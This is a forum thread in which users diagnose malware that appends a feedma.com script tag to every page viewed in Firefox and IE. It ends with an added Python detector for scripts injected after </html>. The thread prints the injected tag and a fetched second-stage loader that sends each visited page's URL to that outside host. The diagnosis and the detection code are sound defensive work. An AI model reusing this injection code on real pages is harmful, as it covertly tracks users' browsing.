Virus adds javascript to sites

  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

I've got a little problem. A virus, or some kind of malicious script, is appending the following code to all the sites that Firefox and IE browse to. This does not occur with Chrome or Safari.

Code:
...</html>
<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}"></script>


I'm running NoScript on Firefox so it's being blocked, but I would very much like to remove it.

I've run a thorough virus scan with Avast and an Adware scan with Ad-Aware, both with the latest updates.

I know this probably isn't the best forum for this kind of problem, but I thought you might have a good idea about the files that might be affected and I can repair.
  • Don2007
  • Web Master
  • Web Master
  • Don2007
  • Posts: 4924
  • Loc: NY

Post 3+ Months Ago

Does it always add it to the cgi-bin directory?
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

Feedma.com isn't my directory, or the directory of the site I'm viewing. It just adds the script reference (from the feedma site) to all the pages I view.

This very page I've right clicked -> View Source, and it's the same as above - the extra line is at the very end.
  • UPSGuy
  • Lurker ಠ_ಠ
  • Web Master
  • User avatar
  • Posts: 2733
  • Loc: Nashville, TN

Post 3+ Months Ago

Be sure to run your AV/malware/spyware solutions of choice - looks like a popup ad script to me.
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

UPSGuy wrote:
Be sure to run your AV/malware/spyware solutions of choice - looks like a popup ad script to me.

alex89 wrote:
I've run a thorough virus scan with Avast and an Adware scan with Ad-Aware, both with the latest updates.


But thanks for helping :roll: :P
  • Bigwebmaster
  • Site Admin
  • Site Admin
  • User avatar
  • Posts: 9092
  • Loc: Seattle, WA & Phoenix, AZ

Post 3+ Months Ago

Try running Malwarebytes Anti-Malware. That program seems to catch things many others don't find. Once you download it make sure you run the update program within it so that you have the latest database update.
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

Thanks for the advice :) I had mbam in my downloads folder, never installed.

Starting a full scan of drives C, D, E, F, G, H, J and I. Only 4tbs to go.

Edit: 9 objects infected already. Yay!
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13504
  • Loc: Florida

Post 3+ Months Ago

In the meantime, maybe add feedma.com to your hosts file pointed back at localhost so you can browse freely.
  • UPSGuy
  • Lurker ಠ_ಠ
  • Web Master
  • User avatar
  • Posts: 2733
  • Loc: Nashville, TN

Post 3+ Months Ago

Good call joebert. I forget about this, but I use my hosts as a cross-browser ad blocker since I swap around a lot. This site has a list that's updated pretty often.

@alex
Quote:
Be sure to run your AV/malware/spyware
:P ;)
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

joebert wrote:
In the meantime, maybe add feedma.com to your hosts file pointed back at localhost so you can browse freely.

alex89 wrote:
I'm running NoScript on Firefox so it's being blocked


I love thinking of things before you guys do ;)

@UPSGuy

My most sincere apologies :P (Don't worry, I've got plans to make one that scans all 3 instantly with a 100% success rate)

13 objects found after 12 minutes of scanning. Should have got a mac.
  • grinch2171
  • Moderator
  • Genius
  • User avatar
  • Posts: 6810
  • Loc: Martinsburg, WV

Post 3+ Months Ago

alex89 wrote:
13 objects found after 12 minutes of scanning. Should have got a mac.


I love it when people make comments like this, I find it hilarious. I haven't run an anti-virus, anti-malware, or anti-anything software on any of my home computers in years and I haven't caught a virus or anything malicious during that time. I do run a hardware firewall though. I also have two kids using those PCs and nothing. People like to point fingers at Microsoft and say it is their fault but it isn't. Most of the time it is your fault you got a virus. You clicked on something you shouldn't have, you opened an attachment you shouldn't have, or whatever. The bottom line is, you did something, not Microsoft.
  • digitalMedia
  • a.k.a. dM
  • Genius
  • User avatar
  • Posts: 5149
  • Loc: SC-USA

Post 3+ Months Ago

alex89 wrote:
... Should have got a mac.


Naw, stick with computers. :)
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13504
  • Loc: Florida

Post 3+ Months Ago

alex89 wrote:
joebert wrote:
In the meantime, maybe add feedma.com to your hosts file pointed back at localhost so you can browse freely.

alex89 wrote:
I'm running NoScript on Firefox so it's being blocked


I love thinking of things before you guys do ;)


I love it when people get cocky and end up with VIRUSES ON THEIR COMPUTER because they don't want to listen. ;)

NoScript for Firefox, nice. How does that help you as far as IE or the thing you probably have running in the background looking for nasty updates?

What I want to know is, how is this thing making that line show up in the HTML source you're viewing?
Are you sure you're not going through a proxy that's adding it or something?

I would think that if something's hijacking the page in between the time it gets to your computer, to the time it gets saved to the HTML cache and displayed, ALL browsers would be affected. :scratchhead:
  • Don2007
  • Web Master
  • Web Master
  • Don2007
  • Posts: 4924
  • Loc: NY

Post 3+ Months Ago

Quote from Alex89

alex89 wrote:
Feedma.com isn't my directory, or the directory of the site I'm viewing. It just adds the script reference (from the feedma site) to all the pages.


A .com is a domain, it's never a directory. The code you posted showed the script in the cgi-bin directory which is why I asked about that particular directory. How did the virus writers get write access to your cgi-bin directory?
  • digitalMedia
  • a.k.a. dM
  • Genius
  • User avatar
  • Posts: 5149
  • Loc: SC-USA

Post 3+ Months Ago

Don2007 wrote:
Quote from Alex89

alex89 wrote:
Feedma.com isn't my directory, or the directory of the site I'm viewing. It just adds the script reference (from the feedma site) to all the pages.


A .com is a domain, it's never a directory. The code you posted showed the script in the cgi-bin directory which is why I asked about that particular directory. How did the virus writers get write access to your cgi-bin directory?


I think Alex meant it was a directory site. As in a link exchange directory kind of thing (I'm not going to look, personally). The URL is for THEIR cgi-bin. The virus is inserting that snippet into all the sites he views.
  • Don2007
  • Web Master
  • Web Master
  • Don2007
  • Posts: 4924
  • Loc: NY

Post 3+ Months Ago

No, he said to all the pages of the feedma site, not all sites.
  • ATNO/TW
  • Super Moderator
  • Super Moderator
  • User avatar
  • Posts: 23455
  • Loc: Woodbridge VA

Post 3+ Months Ago

Did anyone download http://feedma.com/cgi-bin/cont/cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113} ?

It yields:

Code:
if(top == self)
{
    document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
}
//


What's up with that?
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

grinch2171 wrote:
alex89 wrote:
13 objects found after 12 minutes of scanning. Should have got a mac.


I love it when people make comments like this, I find it hilarious. I haven't run an anti-virus, anti-malware, or anti-anything software on any of my home computers in years and I haven't caught a virus or anything malicious during that time. I do run a hardware firewall though. I also have two kids using those PCs and nothing. People like to point fingers at Microsoft and say it is their fault but it isn't. Most of the time it is your fault you got a virus. You clicked on something you shouldn't have, you opened an attachment you shouldn't have, or whatever. The bottom line is, you did something, not Microsoft.


Moderate trolling is successful. :P

I'm well aware that it's my fault this happened, I'm just kidding. Although I do respect macs for some of their traits (interface design especially).

joebert wrote:
NoScript for Firefox, nice. How does that help you as far as IE or the thing you probably have running in the background looking for nasty updates?

What I want to know is, how is this thing making that line show up in the HTML source you're viewing?
Are you sure you're not going through a proxy that's adding it or something?

I would think that if something's hijacking the page in between the time it gets to your computer, to the time it gets saved to the HTML cache and displayed, ALL browsers would be affected. :scratchhead:


IE isn't running, and there aren't any processes running that I don't know exactly what they do. (I like to run a tight ship - no extra services/startup/processes than necessary)

That's what I thought as well, but it definitely didn't occur in Safari or Chrome. It's odd. No proxy.

digitalMedia wrote:
The virus is inserting that snippet into all the sites he views.


Yeah you're right. Sorry if I was unclear Don.

ATNO/TW wrote:
Did anyone download http://feedma.com/cgi-bin/cont/cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113} ?

It yields:

Code:
if(top == self)
{
    document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
}
//


What's up with that?


If it's the top frame, add that script again? Wouldn't it loop? I don't know. I think it's probably more for tracking than ads or something malicious. Feel free to correct me if I'm wrong.

Good news though - I left a few scanners on last night, and it isn't happening any more. Had to restart to remove/repair a DLL, I think that was probably it. Does anyone know of a DLL that IE and FF share? I wish I knew more about this kind of thing.

But thanks for all the responses :)
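
An added example, not part of any post in this thread: a check for the symptom alex89 describes (a script tag appended after the closing </html>, present in one browser's copy of the page but not another's), which also produces the hosts-file line joebert suggests as a stopgap. The function names, the CLEAN/AFFECTED sample pages and the page host www.example.org are assumptions made for this example; only the feedma.com script line comes from the thread.

```python
import re
from urllib.parse import urlparse

# Constructed sample input. CLEAN stands for the source as an unaffected
# browser shows it; AFFECTED is the same page with the line from the thread
# appended after </html>. www.example.org is a placeholder page host.
CLEAN = ('<html><head><script src="/js/site.js"></script></head>\n'
         '<body><p>Forum page</p></body></html>\n')
AFFECTED = CLEAN + (
    '<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/'
    'cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}"></script>\n')

SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
HTML_CLOSE = re.compile(r'</html\s*>', re.I)


def trailing_scripts(source):
    """src URLs of <script> tags found after the last </html> tag."""
    closes = list(HTML_CLOSE.finditer(source))
    if not closes:
        return []
    return SCRIPT_SRC.findall(source[closes[-1].end():])


def added_scripts(clean, affected):
    """Script srcs in the affected copy that the clean copy does not have."""
    known = set(SCRIPT_SRC.findall(clean))
    return [s for s in SCRIPT_SRC.findall(affected) if s not in known]


def foreign_hosts(srcs, page_host):
    """Unique hostnames among srcs that differ from the page's own host."""
    hosts = []
    for src in srcs:
        host = (urlparse(src).hostname or "").lower()
        if host and host != page_host.lower() and host not in hosts:
            hosts.append(host)
    return hosts


def hosts_entries(hosts):
    """Hosts-file lines that point each host back at localhost."""
    return ["127.0.0.1 " + h for h in hosts]


if __name__ == "__main__":
    suspects = trailing_scripts(AFFECTED)
    print("after </html>:", suspects)
    print("not in clean copy:", added_scripts(CLEAN, AFFECTED))
    print("\n".join(hosts_entries(foreign_hosts(suspects, "www.example.org"))))
```

The hosts entry only stops the browser from fetching the script; whatever is appending the tag stays on the machine until it is removed.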


© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.